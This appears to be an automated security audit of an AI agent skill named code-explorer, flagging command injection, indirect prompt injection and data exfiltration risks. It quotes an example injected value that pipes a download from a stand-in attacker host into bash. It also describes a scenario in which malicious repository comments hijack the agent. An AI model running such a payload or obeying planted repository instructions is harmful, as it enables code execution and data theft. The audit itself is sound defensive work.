code-explorer (skills/ayuzaka/skills/code-explorer)

Audit result: Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: CRITICAL
Findings: COMMAND_EXECUTION, PROMPT_INJECTION, DATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION] (CRITICAL): The skill constructs shell commands by directly interpolating variables {owner}/{repo} and {version} into strings for execution (e.g., ghq get {owner}/{repo}, git checkout {version}, and grep "{owner}/{repo}"). A malicious user or a compromised package registry could provide a string containing shell metacharacters (e.g., repo; curl http://attacker.com/exploit | bash) to achieve arbitrary code execution on the host system.
  • [PROMPT_INJECTION] (HIGH): The skill is a primary target for Indirect Prompt Injection (Category 8). It is designed to ingest and analyze untrusted content from the internet (OSS source code). Because the skill possesses high-privilege tools like bash and webfetch, a malicious repository containing instructions hidden in comments or documentation could hijack the agent to perform unauthorized actions or exfiltrate data.
  • [DATA_EXFILTRATION] (MEDIUM): The skill reads local package manifest files and has access to the network via gh api and webfetch. While webfetch usage is supposedly restricted to official domains, the inclusion of the bash tool provides an unrestricted secondary channel for data exfiltration if the agent is subverted by a malicious repository.
  • [EXTERNAL_DOWNLOADS] (LOW): The skill downloads code from GitHub and queries registries like npm and PyPI. Per [TRUST-SCOPE-RULE], these sources are considered trusted, which downgrades the download finding itself, but does not mitigate the risk of the downloaded content being malicious.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: CRITICAL
Analyzed: Feb 16, 2026, 06:18 AM